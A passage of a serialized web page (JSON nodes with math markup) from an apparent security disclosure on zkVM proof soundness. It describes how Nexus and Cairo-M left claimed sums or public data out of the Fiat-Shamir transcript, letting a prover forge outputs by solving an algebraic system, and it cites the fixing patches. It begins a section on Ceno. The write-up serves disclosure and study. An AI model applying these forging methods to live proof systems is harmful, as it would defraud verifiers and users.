0},{},[117011,117013,117018],{"type":33,"value":117012},"All ",{"type":28,"tag":98,"props":117014,"children":117016},{"className":117015},[],[117017],{"type":33,"value":114524},{"type":33,"value":117019}," values must sum to zero (everything produced is consumed).",{"type":28,"tag":29,"props":117021,"children":117022},{},[117023,117025,117030],{"type":33,"value":117024},"All constraints are combined into a composition polynomial. The verifier then checks this polynomial at a random point outside the execution domain, known as an ",{"type":28,"tag":4995,"props":117026,"children":117027},{},[117028],{"type":33,"value":117029},"OODS (Out-of-Domain Sampling)",{"type":33,"value":117031}," test.",{"type":28,"tag":29,"props":117033,"children":117034},{},[117035],{"type":28,"tag":4995,"props":117036,"children":117037},{},[117038],{"type":33,"value":115076},{"type":28,"tag":234,"props":117040,"children":117042},{"code":117041},"NexusProof {\n    stark_proof: {\n        commitments: [Merkle roots of trace columns]\n        sampled_values: [polynomial evaluations]\n        fri_proof: [low-degree test proof]\n    }\n    claimed_sum: [FieldElement; NUM_COMPONENTS]  // \u003C- VULNERABLE\n    log_size: [component sizes]\n}\n",[117043],{"type":28,"tag":98,"props":117044,"children":117045},{"__ignoreMap":7},[117046],{"type":33,"value":117041},{"type":28,"tag":29,"props":117048,"children":117049},{},[117050,117052,117057],{"type":33,"value":117051},"The",{"type":28,"tag":98,"props":117053,"children":117055},{"className":117054},[],[117056],{"type":33,"value":114524},{"type":33,"value":117058}," values are checked to be of correct length, that they sum to zero, and are used in the final composition polynomial. But at no point were they absorbed into the transcript.",{"type":28,"tag":29,"props":117060,"children":117061},{},[117062],{"type":28,"tag":206,"props":117063,"children":117066},{"alt":117064,"src":117065},"6_nexus_flow","/posts/zkvms-unfaithful-claims/6_nexus_flow.svg",[],{"type":28,"tag":29,"props":117068,"children":117069},{},[117070,117072,117081],{"type":33,"value":117071},"The OODS check computes the composition polynomial, which includes logup boundary constraints. These constraints are ",{"type":28,"tag":4995,"props":117073,"children":117074},{},[117075,117076],{"type":33,"value":111531},{"type":28,"tag":98,"props":117077,"children":117079},{"className":117078},[],[117080],{"type":33,"value":114524},{"type":33,"value":4160},{"type":28,"tag":29,"props":117083,"children":117084},{},[117085],{"type":33,"value":117086},"The composition polynomial is a random linear combination of constraints:",{"type":28,"tag":29,"props":117088,"children":117089},{},[117090],{"type":28,"tag":98,"props":117091,"children":117093},{"className":117092},[3652,3653],[117094],{"type":28,"tag":116,"props":117095,"children":117097},{"className":117096},[3658],[117098],{"type":28,"tag":116,"props":117099,"children":117101},{"className":117100,"ariaHidden":3664},[3663],[117102,117143,117282],{"type":28,"tag":116,"props":117103,"children":117105},{"className":117104},[3669],[117106,117110,117115,117120,117125,117130,117134,117139],{"type":28,"tag":116,"props":117107,"children":117109},{"className":117108,"style":3780},[3674],[],{"type":28,"tag":116,"props":117111,"children":117113},{"className":117112,"style":21782},[3680,21251],[117114],{"type":33,"value":115889},{"type":28,"tag":116,"props":117116,"children":117118},{"className":117117},[21380],[117119],{"type":33,"value":313},{"type":28,"tag":116,"props":117121,"children":117123},{"className":117122},[3680,21251],[117124],{"type":33,"value":18939},{"type":28,"tag":116,"props":117126,"children":117128},{"className":117127},[21401],[117129],{"type":33,"value":1829},{"type":28,"tag":116,"props":117131,"children":117133},{"className":117132,"style":3857},[3759],[],{"type":28,"tag":116,"props":117135,"children":117137},{"className":117136},[3862],[117138],{"type":33,"value":373},{"type":28,"tag":116,"props":117140,"children":117142},{"className":117141,"style":3857},[3759],[],{"type":28,"tag":116,"props":117144,"children":117146},{"className":117145},[3669],[117147,117151,117208,117212,117269,117273,117278],{"type":28,"tag":116,"props":117148,"children":117150},{"className":117149,"style":115293},[3674],[],{"type":28,"tag":116,"props":117152,"children":117154},{"className":117153},[21287],[117155,117160],{"type":28,"tag":116,"props":117156,"children":117158},{"className":117157,"style":21294},[21287,21292,21293],[117159],{"type":33,"value":108455},{"type":28,"tag":116,"props":117161,"children":117163},{"className":117162},[3695],[117164],{"type":28,"tag":116,"props":117165,"children":117167},{"className":117166},[3700,21305],[117168,117197],{"type":28,"tag":116,"props":117169,"children":117171},{"className":117170},[3705],[117172,117192],{"type":28,"tag":116,"props":117173,"children":117175},{"className":117174,"style":113867},[3710],[117176],{"type":28,"tag":116,"props":117177,"children":117178},{"style":21318},[117179,117183],{"type":28,"tag":116,"props":117180,"children":117182},{"className":117181,"style":3720},[3719],[],{"type":28,"tag":116,"props":117184,"children":117186},{"className":117185},[3725,3726,3727,3728],[117187],{"type":28,"tag":116,"props":117188,"children":117190},{"className":117189},[3680,21251,3728],[117191],{"type":33,"value":3408},{"type":28,"tag":116,"props":117193,"children":117195},{"className":117194},[21407],[117196],{"type":33,"value":21410},{"type":28,"tag":116,"props":117198,"children":117200},{"className":117199},[3705],[117201],{"type":28,"tag":116,"props":117202,"children":117204},{"className":117203,"style":114147},[3710],[117205],{"type":28,"tag":116,"props":117206,"children":117207},{},[],{"type":28,"tag":116,"props":117209,"children":117211},{"className":117210,"style":3798},[3759],[],{"type":28,"tag":116,"props":117213,"children":117215},{"className":117214},[3680],[117216,117221],{"type":28,"tag":116,"props":117217,"children":117219},{"className":117218,"style":114748},[3680,21251],[117220],{"type":33,"value":114751},{"type":28,"tag":116,"props":117222,"children":117224},{"className":117223},[3695],[117225],{"type":28,"tag":116,"props":117226,"children":117228},{"className":117227},[3700,21305],[117229,117258],{"type":28,"tag":116,"props":117230,"children":117232},{"className":117231},[3705],[117233,117253],{"type":28,"tag":116,"props":117234,"children":117236},{"className":117235,"style":93192},[3710],[117237],{"type":28,"tag":116,"props":117238,"children":117239},{"style":115383},[117240,117244],{"type":28,"tag":116,"props":117241,"children":117243},{"className":117242,"style":3720},[3719],[],{"type":28,"tag":116,"props":117245,"children":117247},{"className":117246},[3725,3726,3727,3728],[117248],{"type":28,"tag":116,"props":117249,"children":117251},{"className":117250},[3680,21251,3728],[117252],{"type":33,"value":3408},{"type":28,"tag":116,"props":117254,"children":117256},{"className":117255},[21407],[117257],{"type":33,"value":21410},{"type":28,"tag":116,"props":117259,"children":117261},{"className":117260},[3705],[117262],{"type":28,"tag":116,"props":117263,"children":117265},{"className":117264,"style":92746},[3710],[117266],{"type":28,"tag":116,"props":117267,"children":117268},{},[],{"type":28,"tag":116,"props":117270,"children":117272},{"className":117271,"style":3760},[3759],[],{"type":28,"tag":116,"props":117274,"children":117276},{"className":117275},[3765],[117277],{"type":33,"value":110922},{"type":28,"tag":116,"props":117279,"children":117281},{"className":117280,"style":3760},[3759],[],{"type":28,"tag":116,"props":117283,"children":117285},{"className":117284},[3669],[117286,117290,117352,117357,117362],{"type":28,"tag":116,"props":117287,"children":117289},{"className":117288,"style":3780},[3674],[],{"type":28,"tag":116,"props":117291,"children":117293},{"className":117292},[3680],[117294,117304],{"type":28,"tag":116,"props":117295,"children":117297},{"className":117296},[3680,33],[117298],{"type":28,"tag":116,"props":117299,"children":117301},{"className":117300},[3680],[117302],{"type":33,"value":117303},"constraint",{"type":28,"tag":116,"props":117305,"children":117307},{"className":117306},[3695],[117308],{"type":28,"tag":116,"props":117309,"children":117311},{"className":117310},[3700,21305],[117312,117341],{"type":28,"tag":116,"props":117313,"children":117315},{"className":117314},[3705],[117316,117336],{"type":28,"tag":116,"props":117317,"children":117319},{"className":117318,"style":93192},[3710],[117320],{"type":28,"tag":116,"props":117321,"children":117322},{"style":113790},[117323,117327],{"type":28,"tag":116,"props":117324,"children":117326},{"className":117325,"style":3720},[3719],[],{"type":28,"tag":116,"props":117328,"children":117330},{"className":117329},[3725,3726,3727,3728],[117331],{"type":28,"tag":116,"props":117332,"children":117334},{"className":117333},[3680,21251,3728],[117335],{"type":33,"value":3408},{"type":28,"tag":116,"props":117337,"children":117339},{"className":117338},[21407],[117340],{"type":33,"value":21410},{"type":28,"tag":116,"props":117342,"children":117344},{"className":117343},[3705],[117345],{"type":28,"tag":116,"props":117346,"children":117348},{"className":117347,"style":92746},[3710],[117349],{"type":28,"tag":116,"props":117350,"children":117351},{},[],{"type":28,"tag":116,"props":117353,"children":117355},{"className":117354},[21380],[117356],{"type":33,"value":313},{"type":28,"tag":116,"props":117358,"children":117360},{"className":117359},[3680,21251],[117361],{"type":33,"value":18939},{"type":28,"tag":116,"props":117363,"children":117365},{"className":117364},[21401],[117366],{"type":33,"value":1829},{"type":28,"tag":29,"props":117368,"children":117369},{},[117370,117372,117377,117379,117384],{"type":33,"value":117371},"Since each constraint is linear in its ",{"type":28,"tag":98,"props":117373,"children":117375},{"className":117374},[],[117376],{"type":33,"value":114524},{"type":33,"value":117378},", the overall composition polynomial is linear in all ",{"type":28,"tag":98,"props":117380,"children":117382},{"className":117381},[],[117383],{"type":33,"value":114524},{"type":33,"value":117385}," values.",{"type":28,"tag":29,"props":117387,"children":117388},{},[117389,117391],{"type":33,"value":117390},"The verifier checks ",{"type":28,"tag":98,"props":117392,"children":117394},{"className":117393},[3652,3653],[117395],{"type":28,"tag":116,"props":117396,"children":117398},{"className":117397},[3658],[117399],{"type":28,"tag":116,"props":117400,"children":117402},{"className":117401,"ariaHidden":3664},[3663],[117403,117464],{"type":28,"tag":116,"props":117404,"children":117406},{"className":117405},[3669],[117407,117411,117416,117421,117431,117436,117446,117451,117455,117460],{"type":28,"tag":116,"props":117408,"children":117410},{"className":117409,"style":92605},[3674],[],{"type":28,"tag":116,"props":117412,"children":117414},{"className":117413,"style":21782},[3680,21251],[117415],{"type":33,"value":115889},{"type":28,"tag":116,"props":117417,"children":117419},{"className":117418},[21380],[117420],{"type":33,"value":313},{"type":28,"tag":116,"props":117422,"children":117424},{"className":117423},[3680,33],[117425],{"type":28,"tag":116,"props":117426,"children":117428},{"className":117427},[3680],[117429],{"type":33,"value":117430},"oods",{"type":28,"tag":116,"props":117432,"children":117434},{"className":117433,"style":92663},[3680],[117435],{"type":33,"value":2754},{"type":28,"tag":116,"props":117437,"children":117439},{"className":117438},[3680,33],[117440],{"type":28,"tag":116,"props":117441,"children":117443},{"className":117442},[3680],[117444],{"type":33,"value":117445},"point",{"type":28,"tag":116,"props":117447,"children":117449},{"className":117448},[21401],[117450],{"type":33,"value":1829},{"type":28,"tag":116,"props":117452,"children":117454},{"className":117453,"style":3857},[3759],[],{"type":28,"tag":116,"props":117456,"children":117458},{"className":117457},[3862],[117459],{"type":33,"value":373},{"type":28,"tag":116,"props":117461,"children":117463},{"className":117462,"style":3857},[3759],[],{"type":28,"tag":116,"props":117465,"children":117467},{"className":117466},[3669],[117468,117472],{"type":28,"tag":116,"props":117469,"children":117471},{"className":117470,"style":114715},[3674],[],{"type":28,"tag":116,"props":117473,"children":117475},{"className":117474},[3680,33],[117476],{"type":28,"tag":116,"props":117477,"children":117479},{"className":117478},[3680],[117480],{"type":33,"value":116214},{"type":28,"tag":29,"props":117482,"children":117483},{},[117484,117486,117491,117493,117498],{"type":33,"value":117485},"With ",{"type":28,"tag":98,"props":117487,"children":117489},{"className":117488},[],[117490],{"type":33,"value":114524},{"type":33,"value":117492}," not in transcript, the composition polynomial becomes a linear function of the ",{"type":28,"tag":98,"props":117494,"children":117496},{"className":117495},[],[117497],{"type":33,"value":114524},{"type":33,"value":117499}," values. Combined with the constraint that claimed sums must sum to zero, this is a small linear system that is easily solvable.",{"type":28,"tag":29,"props":117501,"children":117502},{},[117503,117507,117509],{"type":28,"tag":4995,"props":117504,"children":117505},{},[117506],{"type":33,"value":116370},{"type":33,"value":117508}," Fixed on October 24, 2025 via ",{"type":28,"tag":87,"props":117510,"children":117513},{"href":117511,"rel":117512},"https://github.com/nexus-xyz/nexus-zkvm/pull/503",[91],[117514],{"type":33,"value":117515},"PR #503",{"type":28,"tag":18457,"props":117517,"children":117518},{},[],{"type":28,"tag":75,"props":117520,"children":117522},{"id":117521},"cairo-m-kakarot-labs",[117523],{"type":33,"value":117524},"Cairo-M (Kakarot Labs)",{"type":28,"tag":29,"props":117526,"children":117527},{},[117528],{"type":33,"value":117529},"Cairo-M, built by Kakarot Labs, is an alternative proof system for the Cairo VM (used by Starknet).",{"type":28,"tag":29,"props":117531,"children":117532},{},[117533],{"type":33,"value":117534},"Cairo-M is in many ways similar to Nexus. It uses logup to prove global statements about the execution.",{"type":28,"tag":29,"props":117536,"children":117537},{},[117538],{"type":28,"tag":4995,"props":117539,"children":117540},{},[117541],{"type":33,"value":115076},{"type":28,"tag":234,"props":117543,"children":117545},{"code":117544},"Proof {\n    claim: ComponentSizes,\n    interaction_claim: LogupClaimsPerComponent,\n    public_data: {          // \u003C- VULNERABLE\n        initial_registers: { pc, fp },\n        final_registers: { pc, fp }, // \u003C- forged\n        clock,                       // \u003C- forged\n        initial_root,                \n        final_root,                  // \u003C- forged\n        public_memory: { program, input, output }, //output modified\n    },\n    stark_proof: [...],\n}\n",[117546],{"type":28,"tag":98,"props":117547,"children":117548},{"__ignoreMap":7},[117549],{"type":33,"value":117544},{"type":28,"tag":29,"props":117551,"children":117552},{},[117553],{"type":28,"tag":4995,"props":117554,"children":117555},{},[117556],{"type":33,"value":115092},{"type":28,"tag":29,"props":117558,"children":117559},{},[117560],{"type":28,"tag":206,"props":117561,"children":117564},{"alt":117562,"src":117563},"7_cairo_m_verification","/posts/zkvms-unfaithful-claims/7_cairo_m_verification.svg",[],{"type":28,"tag":29,"props":117566,"children":117567},{},[117568,117570,117576],{"type":33,"value":117569},"Lookup challenges are derived without ",{"type":28,"tag":98,"props":117571,"children":117573},{"className":117572},[],[117574],{"type":33,"value":117575},"public_data",{"type":33,"value":117577}," being  mixed into the transcript.",{"type":28,"tag":29,"props":117579,"children":117580},{},[117581,117582,117587,117589,117594],{"type":33,"value":16275},{"type":28,"tag":98,"props":117583,"children":117585},{"className":117584},[],[117586],{"type":33,"value":117575},{"type":33,"value":117588}," (program I/O, boundary registers, memory roots) enters the lookup relations inside ",{"type":28,"tag":2583,"props":117590,"children":117591},{},[117592],{"type":33,"value":117593},"denominators",{"type":33,"value":117595}," through challenge-weighted encodings of tuples. Abstractly, the verifier checks a relation of the form:",{"type":28,"tag":29,"props":117597,"children":117598},{},[117599],{"type":28,"tag":98,"props":117600,"children":117602},{"className":117601},[3652,3653],[117603],{"type":28,"tag":116,"props":117604,"children":117606},{"className":117605},[3658],[117607],{"type":28,"tag":116,"props":117608,"children":117610},{"className":117609,"ariaHidden":3664},[3663],[117611,117671,117717,117763],{"type":28,"tag":116,"props":117612,"children":117614},{"className":117613},[3669],[117615,117619,117625,117630,117639,117644,117653,117658,117662,117667],{"type":28,"tag":116,"props":117616,"children":117618},{"className":117617,"style":92605},[3674],[],{"type":28,"tag":116,"props":117620,"children":117622},{"className":117621},[3680,21251],[117623],{"type":33,"value":117624},"L",{"type":28,"tag":116,"props":117626,"children":117628},{"className":117627},[21380],[117629],{"type":33,"value":313},{"type":28,"tag":116,"props":117631,"children":117633},{"className":117632},[3680,33],[117634],{"type":28,"tag":116,"props":117635,"children":117637},{"className":117636},[3680],[117638],{"type":33,"value":61294},{"type":28,"tag":116,"props":117640,"children":117642},{"className":117641,"style":92663},[3680],[117643],{"type":33,"value":2754},{"type":28,"tag":116,"props":117645,"children":117647},{"className":117646},[3680,33],[117648],{"type":28,"tag":116,"props":117649,"children":117651},{"className":117650},[3680],[117652],{"type":33,"value":3372},{"type":28,"tag":116,"props":117654,"children":117656},{"className":117655},[21401],[117657],{"type":33,"value":1829},{"type":28,"tag":116,"props":117659,"children":117661},{"className":117660,"style":3760},[3759],[],{"type":28,"tag":116,"props":117663,"children":117665},{"className":117664},[3765],[117666],{"type":33,"value":2268},{"type":28,"tag":116,"props":117668,"children":117670},{"className":117669,"style":3760},[3759],[],{"type":28,"tag":116,"props":117672,"children":117674},{"className":117673},[3669],[117675,117679,117689,117694,117704,117708,117713],{"type":28,"tag":116,"props":117676,"children":117678},{"className":117677,"style":92605},[3674],[],{"type":28,"tag":116,"props":117680,"children":117682},{"className":117681},[3680,33],[117683],{"type":28,"tag":116,"props":117684,"children":117686},{"className":117685},[3680],[117687],{"type":33,"value":117688},"(other transcript",{"type":28,"tag":116,"props":117690,"children":117692},{"className":117691,"style":92663},[3680],[117693],{"type":33,"value":2754},{"type":28,"tag":116,"props":117695,"children":117697},{"className":117696},[3680,33],[117698],{"type":28,"tag":116,"props":117699,"children":117701},{"className":117700},[3680],[117702],{"type":33,"value":117703},"bound terms)",{"type":28,"tag":116,"props":117705,"children":117707},{"className":117706,"style":3857},[3759],[],{"type":28,"tag":116,"props":117709,"children":117711},{"className":117710},[3862],[117712],{"type":33,"value":373},{"type":28,"tag":116,"props":117714,"children":117716},{"className":117715,"style":3857},[3759],[],{"type":28,"tag":116,"props":117718,"children":117720},{"className":117719},[3669],[117721,117726,117731,117736,117741,117745,117750,117754,117759],{"type":28,"tag":116,"props":117722,"children":117725},{"className":117723,"style":117724},[3674],"height:0.8778em;vertical-align:-0.1944em;",[],{"type":28,"tag":116,"props":117727,"children":117729},{"className":117728},[3680],[117730],{"type":33,"value":353},{"type":28,"tag":116,"props":117732,"children":117734},{"className":117733},[3791],[117735],{"type":33,"value":3794},{"type":28,"tag":116,"props":117737,"children":117740},{"className":117738,"style":117739},[3759],"margin-right:2em;",[],{"type":28,"tag":116,"props":117742,"children":117744},{"className":117743,"style":3798},[3759],[],{"type":28,"tag":116,"props":117746,"children":117748},{"className":117747},[3680,21251],[117749],{"type":33,"value":117624},{"type":28,"tag":116,"props":117751,"children":117753},{"className":117752,"style":3857},[3759],[],{"type":28,"tag":116,"props":117755,"children":117757},{"className":117756},[3862],[117758],{"type":33,"value":373},{"type":28,"tag":116,"props":117760,"children":117762},{"className":117761,"style":3857},[3759],[],{"type":28,"tag":116,"props":117764,"children":117766},{"className":117765},[3669],[117767,117772,117829,117833,118051],{"type":28,"tag":116,"props":117768,"children":117771},{"className":117769,"style":117770},[3674],"height:1.4071em;vertical-align:-0.562em;",[],{"type":28,"tag":116,"props":117773,"children":117775},{"className":117774},[21287],[117776,117781],{"type":28,"tag":116,"props":117777,"children":117779},{"className":117778,"style":21294},[21287,21292,21293],[117780],{"type":33,"value":108455},{"type":28,"tag":116,"props":117782,"children":117784},{"className":117783},[3695],[117785],{"type":28,"tag":116,"props":117786,"children":117788},{"className":117787},[3700,21305],[117789,117818],{"type":28,"tag":116,"props":117790,"children":117792},{"className":117791},[3705],[117793,117813],{"type":28,"tag":116,"props":117794,"children":117796},{"className":117795,"style":113867},[3710],[117797],{"type":28,"tag":116,"props":117798,"children":117799},{"style":21318},[117800,117804],{"type":28,"tag":116,"props":117801,"children":117803},{"className":117802,"style":3720},[3719],[],{"type":28,"tag":116,"props":117805,"children":117807},{"className":117806},[3725,3726,3727,3728],[117808],{"type":28,"tag":116,"props":117809,"children":117811},{"className":117810},[3680,21251,3728],[117812],{"type":33,"value":3408},{"type":28,"tag":116,"props":117814,"children":117816},{"className":117815},[21407],[117817],{"type":33,"value":21410},{"type":28,"tag":116,"props":117819,"children":117821},{"className":117820},[3705],[117822],{"type":28,"tag":116,"props":117823,"children":117825},{"className":117824,"style":114147},[3710],[117826],{"type":28,"tag":116,"props":117827,"children":117828},{},[],{"type":28,"tag":116,"props":117830,"children":117832},{"className":117831,"style":3798},[3759],[],{"type":28,"tag":116,"props":117834,"children":117836},{"className":117835},[3680],[117837,117841,118047],{"type":28,"tag":116,"props":117838,"children":117840},{"className":117839},[21380,113178],[],{"type":28,"tag":116,"props":117842,"children":117844},{"className":117843},[113183],[117845],{"type":28,"tag":116,"props":117846,"children":117848},{"className":117847},[3700,21305],[117849,118035],{"type":28,"tag":116,"props":117850,"children":117852},{"className":117851},[3705],[117853,118030],{"type":28,"tag":116,"props":117854,"children":117856},{"className":117855,"style":113196},[3710],[117857,117999,118010],{"type":28,"tag":116,"props":117858,"children":117859},{"style":113200},[117860,117864],{"type":28,"tag":116,"props":117861,"children":117863},{"className":117862,"style":111831},[3719],[],{"type":28,"tag":116,"props":117865,"children":117867},{"className":117866},[3725,3726,3727,3728],[117868],{"type":28,"tag":116,"props":117869,"children":117871},{"className":117870},[3680,3728],[117872,117877,117882,117888,117893,117898,117955,117960,117969,117974,117983,117989,117994],{"type":28,"tag":116,"props":117873,"children":117875},{"className":117874,"style":113217},[3680,21251,3728],[117876],{"type":33,"value":113220},{"type":28,"tag":116,"props":117878,"children":117880},{"className":117879},[3765,3728],[117881],{"type":33,"value":2268},{"type":28,"tag":116,"props":117883,"children":117885},{"className":117884},[21380,3728],[117886],{"type":33,"value":117887},"⟨",{"type":28,"tag":116,"props":117889,"children":117891},{"className":117890,"style":114748},[3680,21251,3728],[117892],{"type":33,"value":114751},{"type":28,"tag":116,"props":117894,"children":117896},{"className":117895},[3791,3728],[117897],{"type":33,"value":3794},{"type":28,"tag":116,"props":117899,"children":117901},{"className":117900},[3680,3728],[117902,117907],{"type":28,"tag":116,"props":117903,"children":117905},{"className":117904},[3680,21251,3728],[117906],{"type":33,"value":1554},{"type":28,"tag":116,"props":117908,"children":117910},{"className":117909},[3695],[117911],{"type":28,"tag":116,"props":117912,"children":117914},{"className":117913},[3700,21305],[117915,117944],{"type":28,"tag":116,"props":117916,"children":117918},{"className":117917},[3705],[117919,117939],{"type":28,"tag":116,"props":117920,"children":117922},{"className":117921,"style":113984},[3710],[117923],{"type":28,"tag":116,"props":117924,"children":117925},{"style":108515},[117926,117930],{"type":28,"tag":116,"props":117927,"children":117929},{"className":117928,"style":108520},[3719],[],{"type":28,"tag":116,"props":117931,"children":117933},{"className":117932},[3725,108525,108526,3728],[117934],{"type":28,"tag":116,"props":117935,"children":117937},{"className":117936},[3680,21251,3728],[117938],{"type":33,"value":3408},{"type":28,"tag":116,"props":117940,"children":117942},{"className":117941},[21407],[117943],{"type":33,"value":21410},{"type":28,"tag":116,"props":117945,"children":117947},{"className":117946},[3705],[117948],{"type":28,"tag":116,"props":117949,"children":117951},{"className":117950,"style":108545},[3710],[117952],{"type":28,"tag":116,"props":117953,"children":117954},{},[],{"type":28,"tag":116,"props":117956,"children":117958},{"className":117957},[21380,3728],[117959],{"type":33,"value":313},{"type":28,"tag":116,"props":117961,"children":117963},{"className":117962},[3680,33,3728],[117964],{"type":28,"tag":116,"props":117965,"children":117967},{"className":117966},[3680,3728],[117968],{"type":33,"value":61294},{"type":28,"tag":116,"props":117970,"children":117972},{"className":117971,"style":92663},[3680,3728],[117973],{"type":33,"value":2754},{"type":28,"tag":116,"props":117975,"children":117977},{"className":117976},[3680,33,3728],[117978],{"type":28,"tag":116,"props":117979,"children":117981},{"className":117980},[3680,3728],[117982],{"type":33,"value":3372},{"type":28,"tag":116,"props":117984,"children":117986},{"className":117985},[21401,3728],[117987],{"type":33,"value":117988},")⟩",{"type":28,"tag":116,"props":117990,"children":117992},{"className":117991},[3765,3728],[117993],{"type":33,"value":2268},{"type":28,"tag":116,"props":117995,"children":117997},{"className":117996,"style":114803},[3680,21251,3728],[117998],{"type":33,"value":114806},{"type":28,"tag":116,"props":118000,"children":118001},{"style":113233},[118002,118006],{"type":28,"tag":116,"props":118003,"children":118005},{"className":118004,"style":111831},[3719],[],{"type":28,"tag":116,"props":118007,"children":118009},{"className":118008,"style":113243},[113242],[],{"type":28,"tag":116,"props":118011,"children":118012},{"style":113247},[118013,118017],{"type":28,"tag":116,"props":118014,"children":118016},{"className":118015,"style":111831},[3719],[],{"type":28,"tag":116,"props":118018,"children":118020},{"className":118019},[3725,3726,3727,3728],[118021],{"type":28,"tag":116,"props":118022,"children":118024},{"className":118023},[3680,3728],[118025],{"type":28,"tag":116,"props":118026,"children":118028},{"className":118027},[3680,3728],[118029],{"type":33,"value":1824},{"type":28,"tag":116,"props":118031,"children":118033},{"className":118032},[21407],[118034],{"type":33,"value":21410},{"type":28,"tag":116,"props":118036,"children":118038},{"className":118037},[3705],[118039],{"type":28,"tag":116,"props":118040,"children":118043},{"className":118041,"style":118042},[3710],"height:0.562em;",[118044],{"type":28,"tag":116,"props":118045,"children":118046},{},[],{"type":28,"tag":116,"props":118048,"children":118050},{"className":118049},[21401,113178],[],{"type":28,"tag":116,"props":118052,"children":118054},{"className":118053},[3680],[118055],{"type":33,"value":141},{"type":28,"tag":29,"props":118057,"children":118058},{},[118059,118061],{"type":33,"value":118060},"The global check is then that ",{"type":28,"tag":98,"props":118062,"children":118064},{"className":118063},[3652,3653],[118065],{"type":28,"tag":116,"props":118066,"children":118068},{"className":118067},[3658],[118069],{"type":28,"tag":116,"props":118070,"children":118072},{"className":118071,"ariaHidden":3664},[3663],[118073,118114,118145],{"type":28,"tag":116,"props":118074,"children":118076},{"className":118075},[3669],[118077,118081,118086,118091,118096,118101,118105,118110],{"type":28,"tag":116,"props":118078,"children":118080},{"className":118079,"style":3780},[3674],[],{"type":28,"tag":116,"props":118082,"children":118084},{"className":118083},[3680,21251],[118085],{"type":33,"value":117624},{"type":28,"tag":116,"props":118087,"children":118089},{"className":118088},[21380],[118090],{"type":33,"value":313},{"type":28,"tag":116,"props":118092,"children":118094},{"className":118093},[3680,21251],[118095],{"type":33,"value":29},{"type":28,"tag":116,"props":118097,"children":118099},{"className":118098},[21401],[118100],{"type":33,"value":1829},{"type":28,"tag":116,"props":118102,"children":118104},{"className":118103,"style":3760},[3759],[],{"type":28,"tag":116,"props":118106,"children":118108},{"className":118107},[3765],[118109],{"type":33,"value":2268},{"type":28,"tag":116,"props":118111,"children":118113},{"className":118112,"style":3760},[3759],[],{"type":28,"tag":116,"props":118115,"children":118117},{"className":118116},[3669],[118118,118122,118132,118136,118141],{"type":28,"tag":116,"props":118119,"children":118121},{"className":118120,"style":3780},[3674],[],{"type":28,"tag":116,"props":118123,"children":118125},{"className":118124},[3680,33],[118126],{"type":28,"tag":116,"props":118127,"children":118129},{"className":118128},[3680],[118130],{"type":33,"value":118131},"(other terms)",{"type":28,"tag":116,"props":118133,"children":118135},{"className":118134,"style":3857},[3759],[],{"type":28,"tag":116,"props":118137,"children":118139},{"className":118138},[3862],[118140],{"type":33,"value":373},{"type":28,"tag":116,"props":118142,"children":118144},{"className":118143,"style":3857},[3759],[],{"type":28,"tag":116,"props":118146,"children":118148},{"className":118147},[3669],[118149,118153],{"type":28,"tag":116,"props":118150,"children":118152},{"className":118151,"style":93694},[3674],[],{"type":28,"tag":116,"props":118154,"children":118156},{"className":118155},[3680],[118157],{"type":33,"value":353},{"type":28,"tag":29,"props":118159,"children":118160},{},[118161],{"type":33,"value":118162},"With challenges fixed, this is a rational equation in public data. This is not linear, but still algebraically solvable.",{"type":28,"tag":29,"props":118164,"children":118165},{},[118166],{"type":33,"value":118167},"Public-data coordinates participate in verification relations through extension-field arithmetic (including extension-valued public-memory entries), so the forged-parameter search is a coupled extension-field system.",{"type":28,"tag":29,"props":118169,"children":118170},{},[118171,118175,118177],{"type":28,"tag":4995,"props":118172,"children":118173},{},[118174],{"type":33,"value":116370},{"type":33,"value":118176}," Fixed on October 31, 2025 via ",{"type":28,"tag":87,"props":118178,"children":118181},{"href":118179,"rel":118180},"https://github.com/kkrt-labs/cairo-m/pull/352/commits/92b6740937e904e0002e7ee099fec357127c1d16",[91],[118182],{"type":33,"value":118183},"commit 92b6740",{"type":28,"tag":18457,"props":118185,"children":118186},{},[],{"type":28,"tag":75,"props":118188,"children":118190},{"id":118189},"ceno-scroll",[118191],{"type":33,"value":118192},"Ceno (Scroll)",{"type":28,"tag":29,"props":118194,"children":118195},{},[118196],{"type":33,"value":118197},"Ceno is a zkVM by Scroll, using GKR with a tower sumcheck structure.",{"type":28,"tag":29,"props":118199,"children":118200},{},[118201,118203,118208],{"type":33,"value":118202},"Ceno splits verification into ",{"type":28,"tag":4995,"props":118204,"children":118205},{},[118206],{"type":33,"value":118207},"chips",{"type":33,"value":118209},", with one per opcode or lookup table. Each chip proves its constraints independently.",{"type":28,"tag":29,"props":118211,"children":118212},{},[118213,118215,118220],{"type":33,"value":118214},"Many per-record values (reads, writes, lookups) are batched into a binary tree structure. Each layer folds pairs of values with random challenges; this is the ",{"type":28,"tag":4995,"props":118216,"children":118217},{},[118218],{"type":33,"value":118219},"tower sumcheck",{"type":33,"value":141},{"type":28,"tag":29,"props":118222,"children":118223},{},[118224],{"type":33,"value":118225},"All read records must match all write records (plus initial/final state). This is checked via a multiset equality, this time using a product instead of logup:",{"type":28,"tag":29,"props":118227,"children":118228},{},[118229],{"type":28,"tag":98,"props":118230,"children":118232},{"className":118231},[3652,3653],[118233],{"type":28,"tag":116,"props":118234,"children":118236},{"className":118235},[3658],[118237],{"type":28,"tag":116,"props":118238,"children":118240},{"className":118239,"ariaHidden":3664},[3663],[118241,118415,118588],{"type":28,"tag":116,"props":118242,"children":118244},{"className":118243},[3669],[118245,118249,118307,118311,118320,118325,118335,118340,118402,118406,118411],{"type":28,"tag":116,"props":118246,"children":118248},{"className":118247,"style":92605},[3674],[],{"type":28,"tag":116,"props":118250,"children":118252},{"className":118251},[21287],[118253,118259],{"type":28,"tag":116,"props":118254,"children":118256},{"className":118255,"style":21294},[21287,21292,21293],[118257],{"type":33,"value":118258},"∏",{"type":28,"tag":116,"props":118260,"children":118262},{"className":118261},[3695],[118263],{"type":28,"tag":116,"props":118264,"children":118266},{"className":118265},[3700,21305],[118267,118296],{"type":28,"tag":116,"props":118268,"children":118270},{"className":118269},[3705],[118271,118291],{"type":28,"tag":116,"props":118272,"children":118274},{"className":118273,"style":113867},[3710],[118275],{"type":28,"tag":116,"props":118276,"children":118277},{"style":21318},[118278,118282],{"type":28,"tag":116,"props":118279,"children":118281},{"className":118280,"style":3720},[3719],[],{"type":28,"tag":116,"props":118283,"children":118285},{"className":118284},[3725,3726,3727,3728],[118286],{"type":28,"tag":116,"props":118287,"children":118289},{"className":118288},[3680,21251,3728],[118290],{"type":33,"value":3408},{"type":28,"tag":116,"props":118292,"children":118294},{"className":118293},[21407],[118295],{"type":33,"value":21410},{"type":28,"tag"